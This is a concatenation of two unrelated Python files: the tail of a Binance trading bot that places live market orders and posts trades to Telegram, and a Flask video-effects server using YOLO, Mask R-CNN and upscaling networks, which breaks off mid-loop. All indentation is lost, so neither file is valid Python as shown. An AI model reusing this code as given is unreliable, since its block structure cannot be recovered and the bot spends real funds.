# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def pause_bot():
'''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, session_profit, hsp_head
# start counting for how long the bot's been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}')
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and set bot_paused to False
if bot_paused == True:
print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
bot_paused = False
return
def convert_volume():
'''Converts the volume in free USDT to the coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
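# Worked example (illustrative): a step_size of '0.00100000' gives
# step_size.index('1') - 1 == 3, i.e. volumes rounded to 3 decimal places;
# '1.00000000' gives -1, which is clamped to 0 (whole units only).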
# use 90% of the free USDT balance (floored) instead of a fixed QUANTITY
free_balance = client.get_asset_balance(asset='USDT')
free = math.floor(float(free_balance['free']) * 0.9)
# calculate the coin volume from the free USDT balance
volume[coin] = float(free / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
def buy():
'''Place Buy market orders for each volatile coin found'''
LastPricea = client.get_symbol_ticker(symbol='TRXUSDT')
lastpriceb = LastPricea['price']
volume, last_price = convert_volume()
orders = {}
LastPricea = client.get_symbol_ticker(symbol='TRXUSDT')
current = LastPricea['price']
currentprice = float(current)
currentprice_str = str(current)
LastPriceb = client.get_symbol_ticker(symbol='TRXUSDT')
currentpriceb = LastPriceb['price']
max = str(currentpriceb)
with open('current_price.txt', 'r') as file:
btccurrent = file.readlines()[-1]
lastcurrent = btccurrent.strip('\n').strip(' ')
iscurrent = float(lastcurrent)
with open('lastsell.txt', 'r') as file:
lastline = file.readlines()[-1]
lastsell = lastline.strip('\n').strip(' ')
last_sell = float(lastsell)
if current != iscurrent:
with open('current_price.txt', 'w') as filehandle:
for listitem in currentprice_str:
filehandle.write('%s' % listitem)
with open('maxprice.txt', 'r') as file:
btcbuy = file.readlines()[-1]
lastb = btcbuy.strip('\n').strip(' ')
maxpricec = float(lastb)
if currentprice >= maxpricec :
with open('maxprice.txt', 'w') as filehandle:
for listitem in max:
filehandle.write('%s' % listitem)
with open('maxprice.txt', 'r') as file:
btcbuy = file.readlines()[-1]
lastb = btcbuy.strip('\n').strip(' ')
maxpricea = float(lastb)
# Hier neuer bear code
with open('lastsell.txt', 'r') as file:
sellline = file.readlines()[-1]
lastsell = sellline.strip('\n').strip(' ')
last_sell = float(lastsell)
if currentprice <= last_sell :
with open('lastsell.txt', 'w') as filehandle:
for listitem in max:
filehandle.write('%s' % listitem)
with open('lastsell.txt', 'r') as file:
sellline = file.readlines()[-1]
lastsell = sellline.strip('\n').strip(' ')
last_sell = float(lastsell)
with open('lastsellstatic.txt', 'r') as file:
selllinestat = file.readlines()[-1]
lastsellstat = selllinestat.strip('\n').strip(' ')
last_sell_static = float(lastsellstat)
with open('pricechange.txt', 'r') as file:
changeline = file.readlines()[-1]
changeitem = changeline.strip('\n').strip(' ')
price_change = float(changeitem)
for coin in volume:
# only buy if there are no active trades on the coin
if coin not in coins_bought and price_change <= (-0.9) and currentprice >= last_sell * 1.007:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
boughtat_a = client.get_symbol_ticker(symbol='TRXUSDT')
boughtat = boughtat_a['price']
boughtsafe = str(boughtat)
rest = str('0')
# Log trade
if LOG_TRADES:
write_log(f"I just bought: {volume[coin]} {coin} @ {last_price[coin]['price']}")
# reset maxprice for this buy so it will also work in more bearish trends
newprice = last_price[coin]['price']
newpricea = str(newprice)
with open('maxprice.txt', 'w') as filehandle:
for listitem in boughtsafe:
filehandle.write('%s' % listitem)
# read trade log and send info to telegram bot
with open('trades.txt', 'r') as file:
logline = file.readlines()[-1]
lastlogbuy = logline.strip('\n').strip(' ')
telebuy = str(lastlogbuy)
telegram_send.send(messages=[telebuy])
elif (coin not in coins_bought and price_change >= (-0.9) and float(lastpriceb) >= last_sell_static and maxpricea >= last_sell_static * 1.0007 and currentprice <= maxpricea and currentprice >= maxpricea * 0.9996) or (coin not in coins_bought and price_change >= (-0.9) and last_sell_static >= currentprice and currentprice >= last_sell_static * 0.99 and currentprice >= last_sell * 1.0012) or (coin not in coins_bought and price_change >= (-0.9) and currentprice <= last_sell_static * 0.99 and currentprice >= last_sell * 1.007) :
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
boughtat_a = client.get_symbol_ticker(symbol='TRXUSDT')
boughtat = boughtat_a['price']
boughtsafe = str(boughtat)
rest = str('0')
# Log trade
if LOG_TRADES:
write_log(f"I just bought: {volume[coin]} {coin} @ {last_price[coin]['price']}")
# reset maxprice for this buy so it will also work in more bearish trends
newprice = last_price[coin]['price']
newpricea = str(newprice)
with open('maxprice.txt', 'w') as filehandle:
for listitem in boughtsafe:
filehandle.write('%s' % listitem)
# read trade log and send info to telegram bot
with open('trades.txt', 'r') as file:
logline = file.readlines()[-1]
lastlogbuy = logline.strip('\n').strip(' ')
telebuy = str(lastlogbuy)
telegram_send.send(messages=[telebuy])
else:
print(f'Signal detected, but there is already an active trade on {coin}, or buy parameters are not met')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit
last_price = get_price(False) # fetch current prices without touching the rolling window
last_price = get_price(add_to_historical=True) # fetch again and record the prices in the rolling window
coins_sold = {}
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
sell = str(LastPrice)
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
with open('current_price.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
with open('maxprice.txt', 'r') as file:
btcbuy = file.readlines()[-1]
lastb = btcbuy.strip('\n').strip(' ')
maxpricea = float(lastb)
time.sleep(5)
if LastPrice >= maxpricea :
with open('maxprice.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
if (LastPrice <= (maxpricea * 0.9996) and LastPrice >= (BuyPrice * 1.0016)) or (LastPrice <= BuyPrice * 0.991 ):
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}Sell criteria reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}")
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
# Log trade
if LOG_TRADES:
profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here
write_log(f"I just sold: {coins_sold[coin]['volume']} {coin} @ {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%")
session_profit=session_profit + (PriceChange-(TRADING_FEE*2))
# read trade log and send info to telegram bot
with open('trades.txt', 'r') as file:
loglinesell = file.readlines()[-1]
lastlogsell = loglinesell.strip('\n').strip(' ')
telesell = str(lastlogsell)
telegram_send.send(messages=[telesell])
with open('maxprice.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
with open('lastsell.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
with open('lastsellstatic.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
profits_file = str(f"{datetime.now()}, {coins_sold[coin]['volume']}, {BuyPrice}, {LastPrice}, {profit:.2f}, {PriceChange-(TRADING_FEE*2):.2f}'\n'")
with open('profits.txt', 'w') as filehandle:
for listitem in profits_file:
filehandle.write('%s' % listitem)
PriceChangestr = str(PriceChange)
with open('pricechange.txt', 'w') as filehandle:
for listitem in PriceChangestr:
filehandle.write('%s' % listitem)
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
print(f'Sell criteria not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}')
if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins')
# new code
return coins_sold
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
# set to False at start
global bot_paused
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
client = Client(access_key, secret_key, tld='us')
else:
client = Client(access_key, secret_key)
# If the user has a bad / incorrect API key,
# this will stop the script from starting and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size != 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: You are using the Mainnet and live funds. Waiting 1 second as a security measure')
time.sleep(1)
signals = glob.glob("signals/*.exs")
for filename in signals:
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file signals/paused.exc{txcolors.DEFAULT}')
# load signalling modules
try:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# seed initial prices
get_price()
READ_TIMEOUT_COUNT=0
CONNECTION_ERROR_COUNT = 0
while True:
try:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
except ReadTimeout as rt:
READ_TIMEOUT_COUNT += 1
print(f'{txcolors.WARNING}We got a timeout error from Binance. Going to re-loop. Current Count: {READ_TIMEOUT_COUNT}\n{rt}{txcolors.DEFAULT}')
except ConnectionError as ce:
CONNECTION_ERROR_COUNT +=1
print(f'{txcolors.WARNING}We got a connection error from Binance. Going to re-loop. Current Count: {CONNECTION_ERROR_COUNT}\n{ce}{txcolors.DEFAULT}')
|
processing.py
|
# Examples:
# python processing.py -i 192.168.0.12 -o 8002 -s http://192.82.150.11:8083/mjpg/video.mjpg -c a -m ipcam
# python processing.py -i 192.168.0.12 -o 8002 -s https://youtu.be/5JJu-CTDLoc -c a -m video
# python processing.py -i 192.168.0.12 -o 8002 -s my_video.avi -c a -m video
# python processing.py -i 192.168.0.12 -o 8002 -s my_image.jpg -c t -m image
from flask import jsonify
from flask import Flask
from flask import render_template
import threading
import argparse
from flask import request, Response
import psutil
from mode_selector import *
from werkzeug.utils import secure_filename
from zipfile import ZipFile
import pafy
app = Flask(__name__, static_url_path="/static")
app.config["SEND_FILE_MAX_AGE_DEFAULT"] = 0
UPLOAD_FOLDER = "static/user_uploads/"
ALLOWED_EXTENSIONS = set(
["png", "jpg", "jpeg", "gif", "mp4", "avi", "m4v", "webm", "mkv"]
)
class State:
# Working states and lock commands
view_source = False
source_image = ""
source_url = ""
source_mode = ""
output_file_page = ""
screenshot_path = ""
need_to_create_screenshot = False
screenshot_ready = False
working_on = True
frame_processed = 0
total_frames = 0
options = ""
screenshot_lock = False
video_reset_lock = False
video_stop_lock = False
mode_reset_lock = False
source_lock = False
render_mode = ""
superres_model = "LAPSRN"
esrgan_model = "FALCOON"
# Rendering modes dictionary
render_modes_dict = {
'using_yolo_network': False,
'using_caffe_network': False,
'using_mask_rcnn_network': False,
'canny_people_on_background': False,
'canny_people_on_black': False,
'extract_and_replace_background': False,
'extract_and_cut_background': False,
'color_canny': False,
'color_canny_on_background': False,
'color_objects_on_gray_blur': False,
'color_objects_blur': False,
'color_objects_on_gray': False,
'caffe_colorization': False,
'cartoon_effect': False,
'extract_objects_yolo_mode': False,
'text_render_yolo': False,
'denoise_and_sharpen': False,
'sobel': False,
'ascii_painter': False,
'pencil_drawer': False,
'two_colored': False,
'upscale_opencv': False,
'upscale_esrgan': False,
'boost_fps_dain': False
}
# Default rendering settings
# Values will change with AJAX requests
settings_ajax = {
"viewSource" : False,
"cannyBlurSliderValue" : 5,
"cannyThresSliderValue" : 50,
"cannyThresSliderValue2" : 50,
"cannyThres2" : 50,
"saturationSliderValue" : 100,
"contrastSliderValue" : 100,
"brightnessSliderValue" : 0,
"positionSliderValue" : 1,
"confidenceSliderValue" : 20,
"lineThicknessSliderValue" : 2,
"denoiseSliderValue" : 10,
"denoiseSliderValue2" : 10,
"sharpenSliderValue" : 5,
"sharpenSliderValue2" : 5,
"rcnnSizeSliderValue" : 10,
"rcnnBlurSliderValue" : 17,
"sobelSliderValue" : 3,
"asciiSizeSliderValue" : 4,
"asciiIntervalSliderValue" : 10,
"asciiThicknessSliderValue" : 1,
"resizeSliderValue" : 2,
"colorCountSliderValue" : 32,
"mode" : "a",
"superresModel" : "LapSRN",
"esrganModel" : "FALCOON",
"urlSource": "default"
}
server_states = State() # Global instance for accessing settings from requests and rendering loop
timer_start = 0 # Start timer for stopping rendering if user closed tab
timer_end = 0 # End timer for stopping rendering if user closed tab
user_time = 0 # For user timer debug
output_frame = None # Frame to preview on page
progress = 0 # Rendering progress 0-100%
cap = None # VideoCapture object for user frames
cap2 = None # VideoCapture object for secondary video (need for some effects)
lock = threading.Lock() # Lock for thread (multiple browser connections viewing)
main_frame = None # Processing frame from video, image or youtube URL
frame_background = None # Frame for secondary video
fourcc = cv2.VideoWriter_fourcc(*"MJPG") # Format for video saving
writer = None # Writer for video saving
url = ""
def check_if_user_is_connected(timer_start, seconds_to_disconnect):
"""
Stops rendering process after a few seconds if user closed browser tab
:param timer_start: moment of last AJAX user ping
:param seconds_to_disconnect: number of seconds to shutdown
:return:
"""
global user_time
timer_end = time.perf_counter()
user_time = str(round(timer_end)) + ":" + str(round(timer_start))
# print(timer_start)
if not (timer_end - timer_start < seconds_to_disconnect and timer_start != 0):
# print("User is connected")
if timer_start != 0:
print(
"User disconnected, shutting down!"
)
current_pid = os.getpid()
p = psutil.Process(current_pid)
p.terminate() # or p.kill()
def process_frame():
"""
Main rendering function
:return:
"""
global cap, lock, writer, progress, fps, output_frame, file_to_render, zip_obj
frame_boost_list = [] # List for Depth-Aware Video Frame Interpolation frames
frame_boost_sequence = [] # Interpolated frame sequence for video writing
server_states.frame_processed = 0 # Total frames processed
server_states.total_frames = 0 # Total frames in video
received_zip_command = False # Trigger for receiving YOLO objects downloading command by user
file_changed = False # Trigger for file changing by user
started_rendering_video = False # Trigger for start rendering video by user
need_mode_reset = True # Trigger for rendering mode changing by user
server_states.working_on = True # Rendering state is ON
concated = None
need_to_create_new_zip = True # Loop state to open new zip archive
need_to_stop_new_zip = False # Loop state to close zip archive
zip_is_opened = True # Loop state for saving new images to zip archive
zipped_images = False # Loop state for closed zip archive
font = cv2.FONT_HERSHEY_SIMPLEX # Font for rendering stats on frame by OpenCV
resized = None # Resized frame to put on page
fps = 0 # FPS rate
frameEdge = None # Last frame of interpolation sequence
path_to_file, file_to_render = os.path.split(args["source"]) # Get filename from full path
print ("Processing file: " + file_to_render)
server_states.source_url = args["source"] # Youtube URL
server_states.render_mode = args["optionsList"] # Rendering mode from command line
server_states.source_mode = args["mode"] # Source type from command line
# Set source for youtube capturing
if server_states.source_mode == "youtube":
vPafy = pafy.new(server_states.source_url)
play = vPafy.streams[0]
cap = cv2.VideoCapture(play.url)
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# Set source for ip camera capturing
if server_states.source_mode == "ipcam":
cap = cv2.VideoCapture()
cap.open(server_states.source_url)
server_states.total_frames = 1
# Set source for video file capturing
if server_states.source_mode == "video":
cap = cv2.VideoCapture(f"{app.config['UPLOAD_FOLDER']}{file_to_render}")
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# Set source for image file capturing
if server_states.source_mode == "image":
path_to_image, image_file = os.path.split(args["source"])
server_states.source_image = image_file
cap2 = cv2.VideoCapture("input_videos/space.webm") # Secondary video for background replacement
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w") # Zip file with user port name
# Initialize all models
caffe_network = initialize_caffe_network()
caffe_network.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
caffe_network.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
superres_network = initialize_superres_network("LAPSRN")
esrgan_network, device = initialize_esrgan_network("FALCOON", True)
rcnn_network = initialize_rcnn_network(True)
dain_network = initialize_dain_network(True)
yolo_network, layers_names, output_layers, colors_yolo = initialize_yolo_network(
classes, True
)
frame_interp_num = 0 # Interpolated frame number
main_frame = None
f = f1 = None # Two source frames for interpolation
# =============================== Main processing loop ===============================
while server_states.working_on:
# Receive all HTML slider values from JSON dictionary
if settings_ajax is not None:
mode_from_page = str(settings_ajax["mode"])
superres_model_from_page = str(settings_ajax["superresModel"])
esrgan_model_from_page = str(settings_ajax["esrganModel"])
position_value_local = int(settings_ajax["positionSliderValue"])
server_states.view_source = bool(settings_ajax["viewSource"])
# Check if mode change command was received
if server_states.mode_reset_lock:
server_states.render_mode = mode_from_page
server_states.superres_model = superres_model_from_page
server_states.esrgan_model = esrgan_model_from_page
server_states.mode_reset_lock = False
need_mode_reset = True
# Check if video rendering start command was received
if server_states.video_reset_lock:
position_value = 1 # Reset position
need_to_create_writer = True # Create new writer
started_rendering_video = True
received_zip_command = True
server_states.video_reset_lock = False
# print("in loop reset")
else:
position_value = position_value_local # Read frame position from slider
# Check if video rendering stop command was received
if server_states.video_stop_lock:
position_value = 1
started_rendering_video = False
server_states.video_stop_lock = False
# print("in loop stop")
# Check if taking screenshot command was received
if server_states.screenshot_lock:
# print("in loop screenshot")
server_states.need_to_create_screenshot = True
server_states.screenshot_lock = False
else:
position_value = 1
# If user changed rendering mode
if need_mode_reset:
frame_interp_num = 0
# Reset all modes
for mode in render_modes_dict:
render_modes_dict[mode] = False
# print("need mode reset")
# Reinitialize upscale networks with user models from page
superres_network = initialize_superres_network(server_states.superres_model)
esrgan_network, device = initialize_esrgan_network(server_states.esrgan_model, True)
# Set processing algorithm from HTML page
for mode in server_states.render_mode:
if mode == "a":
render_modes_dict['extract_objects_yolo_mode'] = True
render_modes_dict['using_yolo_network'] = True
print("extract_objects_yolo")
if mode == "b":
render_modes_dict['text_render_yolo'] = True
render_modes_dict['using_yolo_network'] = True
print("text_render_yolo")
if mode == "c":
render_modes_dict['canny_people_on_black'] = True
render_modes_dict['using_yolo_network'] = True
print("canny_people_on_black")
if mode == "d":
render_modes_dict['canny_people_on_background'] = True
render_modes_dict['using_yolo_network'] = True
print("canny_people_on_background")
if mode == "e":
render_modes_dict['cartoon_effect'] = True
print("cartoon_effect")
if mode == "f":
render_modes_dict['caffe_colorization'] = True
render_modes_dict['using_caffe_network'] = True
print("caffe_colorization")
if mode == "g":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['extract_and_cut_background'] = True
print("cannyPeopleRCNN + cut background")
if mode == "h":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_canny_on_background'] = True
print("color_canny_on_background")
if mode == "i":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['extract_and_replace_background'] = True
print("cannyPeopleRCNN + replace background")
if mode == "j":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_canny'] = True
print("color_canny")
if mode == "k":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_objects_on_gray'] = True
print("color_objects_on_gray")
if mode == "l":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_objects_on_gray_blur'] = True
print("color_objects_on_gray_blur")
if mode == "m":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_objects_blur'] = True
print("color_objects_on_gray_blur")
if mode == "n":
render_modes_dict['upscale_opencv'] = True
print("imageUpscaler")
if mode == "o":
render_modes_dict['denoise_and_sharpen'] = True
print("denoise_and_sharpen")
if mode == "p":
render_modes_dict['sobel'] = True
print("sobel")
if mode == "q":
render_modes_dict['ascii_painter'] = True
print("ascii_painter")
if mode == "r":
render_modes_dict['pencil_drawer'] = True
print("pencil_drawer")
if mode == "s":
render_modes_dict['two_colored'] = True
print("two_colored")
if mode == "t":
render_modes_dict['upscale_esrgan'] = True
print("upscale_esrgan")
if mode == "z":
render_modes_dict['boost_fps_dain'] = True
print("boost_fps_dain")
need_mode_reset = False
# Prepare settings if source is a video file or youtube/ipcam url
if server_states.source_mode in ("video", "youtube", "ipcam"):
# If stopped rendering
if not started_rendering_video:
# print("in stop loop")
if (cap is not None):
cap.set(1, position_value) # Set current video position from HTML slider value
server_states.frame_processed = 0
if need_to_stop_new_zip:
zip_obj.close()
zip_is_opened = False
need_to_stop_new_zip = False
need_to_create_new_zip = True
else:
# If started rendering
if need_to_create_writer or file_changed:
# cap.set(1, 1)
server_states.frame_processed = 0
# cap.release()
if writer is not None:
writer.release()
if server_states.source_mode == "video":
# cap = cv2.VideoCapture(f"{app.config['UPLOAD_FOLDER']}{file_to_render}")
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
if (render_modes_dict['boost_fps_dain']):
# fps_out = cap.get(cv2.CAP_PROP_FRAME_COUNT) * 7
# Change FPS output with DAIN mode
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}{file_to_render}.avi",
fourcc,
60,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
else:
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}{file_to_render}.avi",
fourcc,
25,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
if server_states.source_mode == "youtube":
vPafy = pafy.new(server_states.source_url)
play = vPafy.streams[0]
# cap = cv2.VideoCapture(play.url)
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
if (render_modes_dict['boost_fps_dain']):
# fps_out = cap.get(cv2.CAP_PROP_FRAME_COUNT) * 7
# Change FPS output with DAIN mode
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}youtube.avi",
fourcc,
60,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
else:
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}youtube.avi",
fourcc,
25,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
if server_states.source_mode == "ipcam":
# source_url = str(settings_ajax["urlSource"])
cap = cv2.VideoCapture()
cap.open(server_states.source_url)
server_states.total_frames = 1
# server_states.source_lock = False
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}ipcam.avi",
fourcc,
25,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
# print("CREATING WRITER 1 WITH SIZE:" + str(round(main_frame.shape[1])))
# Prepare zip opening for YOLO objects
if need_to_create_new_zip:
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
need_to_stop_new_zip = True
need_to_create_new_zip = False
zip_is_opened = True
if file_changed:
